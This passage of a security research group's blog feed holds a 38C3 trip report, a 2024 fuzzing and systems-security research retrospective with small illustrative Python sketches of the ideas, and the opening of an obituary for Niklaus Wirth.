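        self.transitions = 0    # how often we "enter the kernel"

    def prep_read(self, fd, nbytes):
        # Queue a read request without any boundary crossing yet.
        self.sq.append((fd, nbytes))

    def submit_and_wait(self, files):
        # One boundary crossing processes every queued request.
        self.transitions += 1
        while self.sq:
            fd, nbytes = self.sq.popleft()
            self.cq.append((fd, files[fd].read(nbytes)))

    def next_completion(self):
        return self.cq.popleft()

files = {3: io.BytesIO(b"hello"), 4: io.BytesIO(b"world")}
ring = ToyRing()
ring.prep_read(3, 5)
ring.prep_read(4, 5)
ring.submit_and_wait(files)  # a single transition serves both reads
```

&lt;p&gt;With a classic per-call model, each read would cost its own user/kernel transition plus a copy; here, one transition drains the entire submission queue, which is the core of the speedup Harald described.&lt;/p&gt;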
&lt;p&gt;&lt;em&gt;Hacking yourself a satellite - recovering BEESAT-1&lt;/em&gt; by PistonMiner.
A few years after its launch, BEESAT-1 went silent and stopped transferring
telemetry data. PistonMiner took us on a journey of reverse engineering the
firmware, discovering a few bugs along the way and speculating about the
original bug that killed the flash page with the configuration of the telemetry
data (a concurrency bug during the update of the boot parameter). Overall a
super entertaining talk with some insight into the programming of CubeSats.
Highly recommended!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-3-arriving-in-pacific-time"&gt;
&lt;h2&gt;Day 3: Arriving in Pacific Time&lt;/h2&gt;
&lt;p&gt;The time dilation continued and we arrived in Pacific time. It was a slight
struggle to get up as we spent quite some time in the club and only got a few
hours of sleep.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Dialing into the Past: RCE via the Fax Machine - Because Why Not?&lt;/em&gt; by Rick de
Jager and Carlo Meijer.
After getting some big $$$ at pwn2own, Rick and Carlo wanted to have some fun
and thought that a printer can be pwned not just by printing a document
but also remotely by receiving a fax. Surprisingly, the fax interface allows
sending different formats, including print documents that are then processed by
the printer. They used their JPEG 2000 bugs to trigger an RCE through the fax
subsystem and ultimately ran DOOM. I later had some fun playing with the DOOM
interface on the printer as well. Super cool hack.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Beyond BLE: Cracking Open the Black-Box of RF Microcontrollers&lt;/em&gt; by Adam Batori
and Robert Pafford. Another talk I sadly missed but heard lots of good things
about. Added to my watch list for later.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Ultrawide archaeology on Android native libraries&lt;/em&gt; by Luca and Rokhaya.
Luca and Rokhaya have been working on Android apk analysis for a while and they
used this opportunity to present some cool insights they found when downloading
lots of APKs and trying their best with modern machine learning solutions. As it
turns out, downloading large amounts of APKs is hard in the first place.
Surprisingly, many apps include native libraries, and most of them are downloaded
from Maven and other repositories. Developers rarely compile their native
libraries themselves and just dump prebuilt zip archives into their code (which is a
security nightmare as well, but alas). When evaluating binary-similarity
machine-learning solutions, they discovered that these tools don't scale to realistic
datasets. While they can be useful for tiny datasets where function-level comparison
is necessary, they will not be useful for large-scale analysis.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2024/1230/droidiana1.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2024/1230/droidiana2.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Ten years of Rowhammer: A Retrospect (and Path to the Future)&lt;/em&gt; by Daniel Gruss,
Martin Heckel, and Florian Adamsky. Another talk I missed, but according to the
coverage it was super fun! I'll definitely watch the recording.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="departure"&gt;
&lt;h2&gt;Departure&lt;/h2&gt;
&lt;p&gt;On the last day, we enjoyed a final breakfast and headed to the harbor.
As it was the first time in Hamburg for several HexHivers, we had to stroll
through the fish market, get a tasty Matjes sandwich, walk the Elbtunnel and
then it was already time to get to the airport and back to Switzerland.&lt;/p&gt;
&lt;p&gt;We'll be back next year with hopefully another talk, renewed energy, cool hacks,
and lots of time to talk to people. So long, see you next year at the congress,
and hack the planet!&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2024/1230/hamburg.jpg" /&gt;&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="security"></category><category term="congress"></category><category term="38c3"></category><category term="ccc"></category><category term="privacy"></category></entry><entry><title>From Fuzzing to Frameworks: 2024 Research Highlights</title><link href="/blog/2024/1227-retrospective.html" rel="alternate"></link><published>2024-12-27T09:25:00-05:00</published><updated>2024-12-27T09:25:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2024-12-27:/blog/2024/1227-retrospective.html</id><summary type="html">&lt;p&gt;2024 was an active year for the HexHive research group, marked by tireless
efforts to enhance the security of various complex systems. A key trend
throughout the year was the continued evolution of fuzzing research. Notably, we
observed a gradual shift away from general-purpose fuzzing as a primary research
focus …&lt;/p&gt;</summary><content type="html">&lt;p&gt;2024 was an active year for the HexHive research group, marked by tireless
efforts to enhance the security of various complex systems. A key trend
throughout the year was the continued evolution of fuzzing research. Notably, we
observed a gradual shift away from general-purpose fuzzing as a primary research
focus, suggesting that this year may represent the peak of activity in this
area.&lt;/p&gt;
&lt;p&gt;Over the past decade, fuzzing research has seen explosive growth, with many
researchers focusing on general-purpose techniques. This surge has led to the
discovery of countless bugs, turning fuzzing into a critical tool in software
security. However, the frontier of general-purpose fuzzing has largely been
explored, and the focus is transitioning from research to engineering.
Developers are increasingly integrating fuzzing into their standard workflows,
reflecting its maturation as a practice. Major software companies like Google,
Microsoft, and Meta now require developers to write fuzz drivers as part of the
software development lifecycle --- a testament to the enduring impact of
research-driven innovations over the past ten years.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2024/1227/cambrian_explosion.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The landscape of fuzzing tools is also consolidating. Effective new mechanisms
are being integrated into AFL++, which continues to thrive thanks to tireless
community maintenance. Modern alternatives, such as LibAFL --- a reimplementation of
AFL++ in Rust --- are also gaining traction. Despite these advancements, most
fuzzers in 2024 remain focused on detecting memory-safety errors. Consequently,
they are predominantly used to test code written in low-level languages like C
and C++. This focus limits the adoption of fuzzing in companies that favor
higher-level languages, presenting a potential avenue for future research.&lt;/p&gt;
&lt;p&gt;This year, our research emphasized several key areas:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;strong&gt;Trusted system components&lt;/strong&gt;: Strengthening foundational elements of secure systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Browser security&lt;/strong&gt;: Exploring innovative techniques to enhance the safety of web browsers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Oracle creation&lt;/strong&gt;: Developing novel mechanisms to identify diverse types of software bugs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Android ecosystem analysis&lt;/strong&gt;: Investigating the unique security challenges posed by Android's distinct development and deployment paradigms.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As we move forward, we anticipate new research directions and opportunities to
further refine and expand the impact of our work in system security.&lt;/p&gt;
&lt;div class="section" id="general-purpose-fuzzing"&gt;
&lt;h2&gt;General purpose fuzzing&lt;/h2&gt;
&lt;p&gt;As discussed, general-purpose fuzzing has been extensively explored, and we are
approaching a Pareto-optimal balance between generating better inputs, enhancing
feedback mechanisms, and optimizing execution speeds. With &lt;a class="reference external" href="https://nebelwelt.net/files/24Oakland2.pdf"&gt;Halo&lt;/a&gt;, we investigated two nuanced
aspects within this well-charted territory:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;strong&gt;Counter-example generation&lt;/strong&gt;: By analyzing fuzzing campaigns, we
characterized the input space to bias the fuzzer toward generating more
effective inputs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Input space refinement&lt;/strong&gt;: Negative examples --- inputs that neither trigger new
coverage nor cause crashes --- were used to improve the description of the input
space. This approach allows the fuzzer to &amp;quot;tighten&amp;quot; its input generation and
focus on more promising paths.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In &lt;a class="reference external" href="https://nebelwelt.net/files/24RAID.pdf"&gt;Tango&lt;/a&gt; (published at RAID'24 and
recipient of the Distinguished Paper Award), we addressed a different challenge
in fuzzing: &lt;strong&gt;statefulness&lt;/strong&gt;. Many software systems require navigating multiple
state transitions before reaching specific functionality. For instance:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;strong&gt;Protocol fuzzers&lt;/strong&gt; must transition through several states to access deeper features.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Games&lt;/strong&gt; often demand intricate state triggers to achieve specific goals, such as &amp;quot;winning.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Using state inference, Tango enabled us to tackle this complexity. As a striking
demonstration, we successfully used it to play challenging &amp;quot;pseudo&amp;quot; 3D games
like &lt;em&gt;Doom&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2024/1227/doom.jpg" /&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="securing-system-software"&gt;
&lt;h2&gt;Securing system software&lt;/h2&gt;
&lt;p&gt;System software remains a critical target for our research. Despite its inherent
challenges, its high privilege level makes it essential to secure. The primary
challenges lie in its &lt;strong&gt;complex interfaces&lt;/strong&gt; and the &lt;strong&gt;fuzzing environment&lt;/strong&gt; itself.
System software exposes a wide range of interfaces that attackers can exploit,
such as virtual devices, buses, and hypercalls.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;secure monitor&lt;/strong&gt; is the most privileged software on an ARM device,
operating above the hypervisor to manage interactions between different software
domains. &lt;strong&gt;Hypervisors&lt;/strong&gt;, in turn, interact with diverse devices and buses to
provide I/O and other services. These &lt;em&gt;diverse interfaces&lt;/em&gt; are complex, often
stateful, and challenging to model. This complexity is compounded by the lack of
documentation and source code for privileged software, forming the first major
research challenge.&lt;/p&gt;
&lt;p&gt;The second challenge is the &lt;strong&gt;fuzzing environment&lt;/strong&gt; itself. Unlike user-space
fuzzing, where the &lt;tt class="docutils literal"&gt;fork()&lt;/tt&gt; system call simplifies cloning the program under
test, system software is much harder to replicate. Creating a new instance is
resource-intensive, requiring tasks such as booting a kernel, instantiating a
virtual machine, or resetting a phone. This results in high latency and
necessitates better techniques to offset the cost, emphasizing the importance of
high-quality input to maximize efficiency.&lt;/p&gt;
&lt;p&gt;A core aspect of fuzzing is optimizing for finite resources: given limited
compute cycles, the goal is to discover as many bugs as possible. While creating
high-quality input is costly, it is often beneficial to include some low-quality
inputs to explore diverse feedback. The more complex environments of system
software demand higher-quality and more stateful inputs to balance the cost of
each fuzzing iteration.&lt;/p&gt;
&lt;div class="section" id="el3xir-fuzzing-the-secure-monitor"&gt;
&lt;h3&gt;EL3XIR: Fuzzing the Secure Monitor&lt;/h3&gt;
&lt;p&gt;In &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC2.pdf"&gt;EL3XIR&lt;/a&gt; (SEC'24), we customized a
fuzzer to target the secure monitor in the ARMv8-A ecosystem. This component
orchestrates transitions between the normal and secure worlds via secure monitor
(&lt;tt class="docutils literal"&gt;smc&lt;/tt&gt;) calls. Key challenges included limited introspection, rehosting
difficulties, and a complex input space. Our contributions addressed these
challenges by:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;&lt;strong&gt;Partially rehosting&lt;/strong&gt; the secure monitor firmware, enabling us to fuzz snapshots of partially booted systems.&lt;/li&gt;
&lt;li&gt;Developing a &lt;strong&gt;reflected peripheral model&lt;/strong&gt; that infers peripheral behavior from observed interactions and replicates them during fuzzing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Synthesizing a starting harness&lt;/strong&gt; by analyzing code in the rich operating system to generate effective initial inputs.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These innovations allowed us to deeply explore the secure monitor firmware,
uncovering 34 significant bugs in this highly privileged component.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hyperpill-targeting-the-hardware-virtualization-interface"&gt;
&lt;h3&gt;HyperPill: Targeting the Hardware Virtualization Interface&lt;/h3&gt;
&lt;p&gt;Building on our work with &lt;a class="reference external" href="https://nebelwelt.net/files/23Oakland4.pdf"&gt;ViDeZZo&lt;/a&gt; (Oakland'23), which explored
stateful interactions with peripherals, we developed &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC3.pdf"&gt;HyperPill&lt;/a&gt; (SEC'24 --- winning a distinguished
paper award). This project shifted focus
to the hardware virtualization interface by snapshotting the &lt;tt class="docutils literal"&gt;vmcs&lt;/tt&gt; state and
exploring it via emulation. While emulators are typically slow, they allow cheap
instantiation of existing snapshots. Our evaluation covered major x86
hypervisors and uncovered critical bugs in QEMU, Hyper-V, and the macOS
virtualization framework. Looking ahead, we are extending this approach to more
stateful devices with &lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS4.pdf"&gt;Truman&lt;/a&gt;
(NDSS'25).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="syzrisk-prioritizing-fast-moving-codebases"&gt;
&lt;h3&gt;SyzRisk: Prioritizing Fast-Moving Codebases&lt;/h3&gt;
&lt;p&gt;The Linux kernel, with its ~20 million lines of code and ~400,000 annual
changes, exemplifies the challenge of fast-moving codebases. In &lt;a class="reference external" href="https://nebelwelt.net/files/24AsiaCCS.pdf"&gt;SyzRisk&lt;/a&gt; (AsiaCCS'24), we analyzed commit
message patterns to identify changes likely to expose vulnerabilities. By
directing fuzzing efforts toward these areas, we demonstrated a more efficient
allocation of fuzzing resources.&lt;/p&gt;
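&lt;p&gt;The ranking idea can be sketched in a few lines; the patterns and weights below are invented stand-ins, not SyzRisk's actual model.&lt;/p&gt;

```python
import re

# Toy version of risk-ranking kernel commits by message patterns: commits
# whose messages match "risky" patterns (locking changes, refactors,
# overflow fixes) get fuzzing priority. Patterns and weights are made up.
RISK_PATTERNS = [
    (re.compile(r"\block(ing)?\b", re.I), 3),
    (re.compile(r"\brefactor\b", re.I), 2),
    (re.compile(r"\bfix\b.*\boverflow\b", re.I), 4),
]

def risk_score(commit_msg):
    # Sum the weight of every pattern that matches the message.
    return sum(w for pat, w in RISK_PATTERNS if pat.search(commit_msg))

commits = [
    "net: refactor socket locking",
    "docs: update README",
    "mm: fix integer overflow in page allocator",
]
# Highest-risk commits first: their touched code gets fuzzed first.
ranked = sorted(commits, key=risk_score, reverse=True)
```

&lt;p&gt;The point is the scheduling policy, not the scoring function: any estimator that orders recently changed code by expected bugginess lets a fuzzer spend its cycles where new vulnerabilities are most likely.&lt;/p&gt;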
&lt;/div&gt;
&lt;div class="section" id="syztrust-exploring-trusted-applications"&gt;
&lt;h3&gt;SyzTrust: Exploring Trusted Applications&lt;/h3&gt;
&lt;p&gt;In &lt;a class="reference external" href="https://nebelwelt.net/files/24Oakland.pdf"&gt;SyzTrust&lt;/a&gt; (Oakland'24), we
focused on trusted operating systems on embedded devices. Using external debuggers,
we collected precise execution traces to analyze interactions between trusted
applications and the rest of the system. This approach allowed the fuzzer to
target promising inputs more effectively, leading to better bug discovery.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fuzzing-summary"&gt;
&lt;h3&gt;Fuzzing Summary&lt;/h3&gt;
&lt;p&gt;Our work on fuzzing privileged systems underscores the importance of extracting
meaningful signals. Due to the higher cost of each fuzzing iteration compared to
user-space applications, producing high-quality input and feedback is crucial.
Each of these projects represents a tailored approach to specific challenges,
advancing the state of fuzzing for complex and privileged software.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="the-browser-a-complex-target"&gt;
&lt;h2&gt;The browser, a complex target&lt;/h2&gt;
&lt;p&gt;This year, we advanced browser fuzzing with the development of a new
intermediate representation that enhances our ability to target complex browser
components. In &lt;a class="reference external" href="https://nebelwelt.net/files/24CCS2.pdf"&gt;GraphIR&lt;/a&gt; (CCS'24), we
introduced this intermediate representation to provide the fuzzer with more
effective mutational capabilities. By maintaining target JavaScript programs in
this intermediate representation, our fuzzer applies mutation operators directly
to it, enabling more sophisticated and efficient exploration.&lt;/p&gt;
&lt;p&gt;Looking ahead, we will present &lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS2.pdf"&gt;DUMPLING&lt;/a&gt; at NDSS'25, where we leverage
differential testing on the V8 JavaScript engine. This approach exposes subtle
desynchronization bugs through a novel oracle, further advancing our
capabilities in browser fuzzing.&lt;/p&gt;
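&lt;p&gt;The differential-testing oracle boils down to a simple loop; the two toy functions below stand in for two engine configurations that must agree (they are not DUMPLING's actual setup).&lt;/p&gt;

```python
# Minimal differential-testing oracle: run the same input through two
# implementations that must agree and flag any divergence as a bug, even
# when nothing crashes.
def reference_tier(xs):
    return sum(x * x for x in xs)

def optimized_tier(xs):
    # Injected bug for illustration: mishandles the empty input.
    if not xs:
        return -1
    return sum(x * x for x in xs)

def differential_oracle(inputs):
    mismatches = []
    for xs in inputs:
        a, b = reference_tier(xs), optimized_tier(xs)
        if a != b:
            mismatches.append((xs, a, b))  # a crash-free logic bug
    return mismatches

found = differential_oracle([[1, 2, 3], [], [5]])
```

&lt;p&gt;This is what makes the oracle valuable for a JIT-heavy engine like V8: desynchronization between tiers produces no crash at all, so only a comparison against a second configuration reveals it.&lt;/p&gt;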
&lt;p&gt;In previous work, we explored specific browser components, such as fuzzing the
&lt;a class="reference external" href="https://nebelwelt.net/files/23SEC.pdf"&gt;WebGL interface&lt;/a&gt; (SEC'23). WebGL
exposes the OpenGL interface to JavaScript, enabling 3D computations. We
hypothesized that the graphics stack, being highly optimized, was (likely)
under-tested. Targeting this interface posed unique challenges due to its span
across multiple layers and abstractions, including the browser, libraries, the
operating system kernel, and even the GPU. Achieving adequate coverage in such a
complex system was difficult.&lt;/p&gt;
&lt;p&gt;Our key innovation was replacing traditional coverage metrics with debug signals
from the browser. The fuzzer generated JavaScript code that interacted with
WebGL and monitored debug messages in the browser console to identify malformed
code and its effects. Using these debug signals, the fuzzer iteratively mutated
the code to provoke more interesting and intricate interactions with the WebGL
stack.&lt;/p&gt;
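&lt;p&gt;The debug-signal feedback loop can be sketched as follows; the toy console, message strings, and mutation operators are invented stand-ins for the real browser console and JavaScript mutations.&lt;/p&gt;

```python
import random

# Sketch of feedback from debug messages instead of code coverage: inputs
# that provoke a previously unseen diagnostic are kept as new seeds.
def toy_console(program):
    # Stand-in for the browser console: emits diagnostics for a "program".
    msgs = set()
    if "draw" in program:
        msgs.add("GL_INVALID_OPERATION" if "badbuf" in program else "drawn")
    if "shader" in program:
        msgs.add("shader compile warning")
    return msgs

def mutate(program, rng):
    return program + rng.choice([" draw", " shader", " badbuf"])

rng = random.Random(38)
seen, seeds = set(), [""]
for _ in range(200):
    parent = rng.choice(seeds)
    child = mutate(parent, rng)
    new = toy_console(child) - seen
    if new:               # unseen debug signal: keep child as a new seed
        seen |= new
        seeds.append(child)
```

&lt;p&gt;Replacing coverage with the console's diagnostics keeps the loop structure of a coverage-guided fuzzer intact while sidestepping the need to instrument the browser, libraries, kernel, and GPU all at once.&lt;/p&gt;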
&lt;p&gt;These advancements highlight our desire to improve browser security through
innovative fuzzing techniques and tailored solutions for complex components.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="introducing-new-oracles"&gt;
&lt;h2&gt;Introducing new Oracles&lt;/h2&gt;
&lt;p&gt;Memory safety violations are effectively detected using oracles such as
AddressSanitizer, which are well-suited to low-level software and have uncovered
numerous bugs in the past. However, there are many bugs that go beyond memory
safety errors. In &lt;a class="reference external" href="https://nebelwelt.net/files/24ATC.pdf"&gt;Monarch&lt;/a&gt; (ATC'24),
we explored alternative oracles designed to detect logic bugs in distributed
filesystems, such as desynchronization and other failure modes.&lt;/p&gt;
&lt;p&gt;In parallel, we have investigated methods to prove memory accesses safe. In
&lt;a class="reference external" href="https://nebelwelt.net/files/24CCS.pdf"&gt;Uriah&lt;/a&gt; (CCS'24), we focused on
analyzing heap accesses and demonstrated that a significant portion can be
statically proven safe. This eliminates the need for instrumentation during
fuzzing campaigns or even at runtime, offering stronger safety guarantees with
reduced overhead. At NDSS'25, we will further explore this theme with &lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS3.pdf"&gt;QMSan&lt;/a&gt;, which uses binary rewriting to
detect uninitialized reads as part of fuzzing campaigns.&lt;/p&gt;
&lt;p&gt;In the domain of theoretical language foundations, we built upon our prior work
on &lt;a class="reference external" href="https://nebelwelt.net/files/21ASPLOS.pdf"&gt;Enclosure&lt;/a&gt; (ASPLOS'21) to
develop &lt;a class="reference external" href="https://nebelwelt.net/files/24OOPSLA.pdf"&gt;Gradient&lt;/a&gt; (OOPSLA'24), a
language-based compartmentalization mechanism. Gradient allows developers to
define fine-grained enclosures to control data accessibility. This enables
natural expression of security policies when loading potentially untrusted or
buggy library code, empowering developers to enforce robust compartmentalization
directly within the application.&lt;/p&gt;
&lt;p&gt;These projects represent our continued commitment to advancing memory safety,
bug detection, and secure software development practices through innovative
tools and foundational research.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="android-security"&gt;
&lt;h2&gt;Android security&lt;/h2&gt;
&lt;p&gt;This year, we placed a strong emphasis on Android security, building on our
earlier work such as &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC2.pdf"&gt;EL3XIR&lt;/a&gt;, where
we fuzzed the secure monitor. Beyond this, we delved deeper into the security of
trusted applications, uncovering critical vulnerabilities in the API used to
access them.&lt;/p&gt;
&lt;p&gt;In &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC.pdf"&gt;Spill the TeA&lt;/a&gt;, we conducted an
empirical study examining how trusted applications are patched and whether they
are protected against rollback attacks. While these applications are signed,
they often lack robust rollback protection. Specifically, if rollback counters
are not incremented, older (and potentially vulnerable) versions of applications
can still be loaded and exploited. Alarmingly, we found that rollback counters
are rarely utilized, leaving Android users exposed to attacks from outdated
applications across different devices and models.&lt;/p&gt;
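&lt;p&gt;The rollback problem fits in a few lines: a signature proves a trusted application is genuine, but an old genuine version with a known bug verifies just as well, so only a monotonic counter can reject it. The names and structure below are illustrative, not a real TEE API.&lt;/p&gt;

```python
# Sketch of rollback protection for signed trusted applications (TAs).
class TrustedAppLoader:
    def __init__(self):
        self.min_version = {}  # TA name -> minimum accepted version

    def install(self, name, version):
        # A careful vendor bumps the counter with every security fix.
        self.min_version[name] = max(self.min_version.get(name, 0), version)

    def load(self, name, version, enforce_rollback=True):
        # Without the counter check, any correctly signed version loads,
        # including old, vulnerable ones.
        if enforce_rollback and self.min_version.get(name, 0) > version:
            return "rejected: rollback"
        return "loaded"

loader = TrustedAppLoader()
loader.install("keymaster", 2)                 # v2 fixes a bug present in v1
rejected = loader.load("keymaster", 1)         # old version is rejected
unprotected = loader.load("keymaster", 1, enforce_rollback=False)
```

&lt;p&gt;The study's finding is that, in practice, vendors sit in the &lt;tt class="docutils literal"&gt;enforce_rollback=False&lt;/tt&gt; branch: counters exist but are rarely incremented, so the old version still loads.&lt;/p&gt;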
&lt;p&gt;Our study also highlighted a fundamental flaw in the GlobalPlatform API, which
governs the interaction between Android applications and trusted applications.
This API requires developers to verify whether each argument in a call is a
scalar or a pointer. Unfortunately, this crucial step is frequently overlooked,
leading to arbitrary write vulnerabilities in trusted applications. This issue
was widespread, and our findings, detailed in &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC4.pdf"&gt;GlobalConfusion&lt;/a&gt;, prompted vendors to update the
GlobalPlatform API standard to address this recurring vulnerability.&lt;/p&gt;
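&lt;p&gt;A toy simulation of the parameter-confusion flaw (all names are made up; the real API uses &lt;tt class="docutils literal"&gt;TEE_PARAM_TYPE_*&lt;/tt&gt; constants): the client declares each parameter as a value or a memory reference, and a TA that trusts the declared types without checking them treats an attacker-controlled integer as a memory reference.&lt;/p&gt;

```python
# Illustration of the GlobalPlatform parameter-confusion bug.
VALUE, MEMREF = 0, 1
ta_memory = bytearray(64)  # stand-in for the TA's address space

def buggy_entry(declared_type, param):
    # BUG: uses the caller-declared type without validating it against
    # what this entry point actually expects (a plain VALUE).
    if declared_type == MEMREF:
        offset, data = param
        ta_memory[offset:offset + len(data)] = data  # attacker-chosen write
    return "ok"

def fixed_entry(expected_type, declared_type, param):
    # FIX: the TA states which type it expects and rejects mismatches.
    if declared_type != expected_type:
        return "bad parameters"
    return "ok"

# Attacker declares a MEMREF although the TA expects a plain VALUE:
attack = buggy_entry(MEMREF, (8, b"\xff\xff"))
defended = fixed_entry(VALUE, MEMREF, (8, b"\xff\xff"))
```

&lt;p&gt;In the buggy path, the attacker-supplied pair is dereferenced as offset and data, yielding the arbitrary write; the single type check in the fixed path is the trivial-but-forgotten step the study found missing across many TAs.&lt;/p&gt;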
&lt;p&gt;Additionally, we investigated the security of Android's hardened &lt;tt class="docutils literal"&gt;scudo&lt;/tt&gt;
memory allocator, which is designed to make heap allocations less predictable
using probabilistic keys. However, we discovered that Android's &amp;quot;Zygote&amp;quot; fork
model compromises several of Scudo's mitigations, making exploitation easier. In
our &lt;a class="reference external" href="https://nebelwelt.net/files/24WOOT.pdf"&gt;Scudo&lt;/a&gt; paper, presented at
WOOT'24 and awarded Best Paper, we explored various attack patterns that exploit
these weakened protections.&lt;/p&gt;
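&lt;p&gt;Why the Zygote fork model undermines per-process randomness can be shown with a toy &amp;quot;allocator cookie&amp;quot; (a pure illustration; Scudo's real chunk headers and checksums are more involved): secrets drawn once at startup are inherited identically by every forked child, so leaking the secret from one app reveals it for all apps forked from the same Zygote.&lt;/p&gt;

```python
import os
import secrets

# Secret chosen once when the "Zygote" starts; in a fork-based process
# model, every child inherits this exact value instead of drawing its own.
cookie = secrets.token_bytes(8)

r, w = os.pipe()
pid = os.fork()          # requires a Unix-like OS
if pid == 0:             # child "app": report its (inherited) cookie
    os.close(r)
    os.write(w, cookie)
    os._exit(0)
os.close(w)
child_cookie = os.read(r, 8)
os.waitpid(pid, 0)
```

&lt;p&gt;The child's cookie equals the parent's, which is exactly the property that lets an exploit primitive learned in one Android app carry over to others.&lt;/p&gt;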
&lt;p&gt;In summary, Android's complexity and the interactions between its many
components create a unique security landscape, exposing vulnerabilities in
trusted application access, inter-application communication, and library usage.
Over the coming years, we plan to continue exploring the Android ecosystem, as
it presents numerous opportunities for impactful security research.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion-and-outlook"&gt;
&lt;h2&gt;Conclusion and Outlook&lt;/h2&gt;
&lt;p&gt;This year, we made significant strides in security research across fuzzing,
system software, browser security, and Android security. Our work in fuzzing,
including Halo and Tango, tackled stateful systems and advanced input
generation. On privileged systems, tools like EL3XIR and HyperPill revealed
critical bugs in secure monitors and hypervisors.&lt;/p&gt;
&lt;p&gt;In browser security, GraphIR enhanced fuzzing capabilities, while alternative
oracles such as Monarch uncovered logic bugs. In Android security, we identified
rollback vulnerabilities and critical API flaws, while demonstrating
exploitation risks in memory allocators.&lt;/p&gt;
&lt;p&gt;Looking ahead, we aim to deepen our focus on stateful fuzzing, evolving security
frameworks, and exploring new attack surfaces.
While fuzzing research is gradually slowing down, we continue to explore niche
areas and develop specialized oracles to address underexplored challenges. In
the medium term, fuzzing is expected to transition from a research focus to an
engineering discipline, with research efforts shifting to other domains.
Promising areas of exploration include alternative oracles that go beyond memory
safety, advancements in compartmentalization, and the complex and dynamic field
of Android security.&lt;/p&gt;
&lt;p&gt;We are excited about the opportunities that lie ahead and look forward to
another productive year of research. None of this would be possible without the
dedication and creativity of our exceptional team of postdocs, PhD students,
researchers, and collaborators whose passion and vision drive our efforts to
push the boundaries of security.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2024/1227/hexteam.jpg" /&gt;&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="research trends"></category><category term="fuzzing"></category><category term="hypvervisor"></category><category term="kernel"></category><category term="browser"></category><category term="Android"></category></entry><entry><title>RIP Niklaus Wirth</title><link href="/blog/2024/0105-wirth.html" rel="alternate"></link><published>2024-01-05T11:22:00-05:00</published><updated>2024-01-05T11:22:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2024-01-05:/blog/2024/0105-wirth.html</id><summary type="html">&lt;p&gt;Niklaus Wirth, known for his work on programming languages and systems, &lt;a class="reference external" href="https://amturing.acm.org/award_winners/wirth_1025774.cfm"&gt;died on January 1st, 2024&lt;/a&gt; (&lt;a class="reference external" href="https://ethz.ch/en/news-and-events/eth-news/news/2024/01/computer-pioneer-niklaus-wirth-has-died.html"&gt;ETH Zurich&lt;/a&gt;).
Wirth was known for his work on programming languages and systems with a keen focus on simplicity and functionality for which he was awarded the 1984 Turing Award.
His most well-known language …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Niklaus Wirth, known for his work on programming languages and systems, &lt;a class="reference external" href="https://amturing.acm.org/award_winners/wirth_1025774.cfm"&gt;died on January 1st, 2024&lt;/a&gt; (&lt;a class="reference external" href="https://ethz.ch/en/news-and-events/eth-news/news/2024/01/computer-pioneer-niklaus-wirth-has-died.html"&gt;ETH Zurich&lt;/a&gt;).
Wirth was known for his work on programming languages and systems with a keen focus on simplicity and functionality for which he was awarded the 1984 Turing Award.
His most well-known language is Pascal, a procedural language that rose to fame in the 1980s thanks to Borland's Turbo Pascal compiler.
Pascal offered an easy entry into systems programming.
Apart from its simplicity (it can be learned in a few hours), it allows the user to define their own data types, giving them flexibility.
Compared to C, the other dominant systems language, Pascal came with &lt;em&gt;guard-rails-by-default&lt;/em&gt;.
While C is predominantly known for its bugs, Pascal is known for its efficiency.
Wirth carefully designed his programming languages and made sure that, while they were always effective, there was never any fluff. He was a keen advocate of the KISS principle and lived it throughout his career.
All his languages (and architectures) are designed around that principle: enabling powerful features while remaining easy to learn and protecting the user from making mistakes.&lt;/p&gt;
